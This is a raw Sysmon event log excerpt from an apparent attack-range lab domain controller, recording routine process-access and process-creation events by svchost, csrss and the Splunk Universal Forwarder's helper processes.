13:55:47.013{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009414Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:55:47.013{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009413Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:55:47.013{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009412Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:55:47.013{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009411Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:55:47.013{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009410Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:55:47.013{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009409Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:55:47.013{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-9363-6005-D304-00000000A301}2672C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000009408Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:55:47.013{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-9363-6005-D304-00000000A301}2672C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000009407Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:55:47.014{59A5CD1D-9363-6005-D304-00000000A301}2672C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000009448Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:55:48.841{59A5CD1D-9364-6005-D504-00000000A301}6321112C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009447Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:55:48.701{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-9364-6005-D504-00000000A301}632C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009446Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:55:48.701{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009445Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:55:48.701{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009444Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:55:48.701{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009443Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:55:48.701{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009442Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:55:48.701{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009441Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:55:48.701{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009440Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:55:48.701{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009439Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:55:48.701{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009438Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:55:48.701{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009437Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:55:48.701{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-9364-6005-D504-00000000A301}632C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000009436Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:55:48.701{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-9364-6005-D504-00000000A301}632C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000009435Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:55:48.701{59A5CD1D-9364-6005-D504-00000000A301}632C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000009434Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:55:48.169{59A5CD1D-9364-6005-D404-00000000A301}12084612C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009433Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:55:48.029{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-9364-6005-D404-00000000A301}1208C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009432Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:55:48.029{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009431Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:55:48.029{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 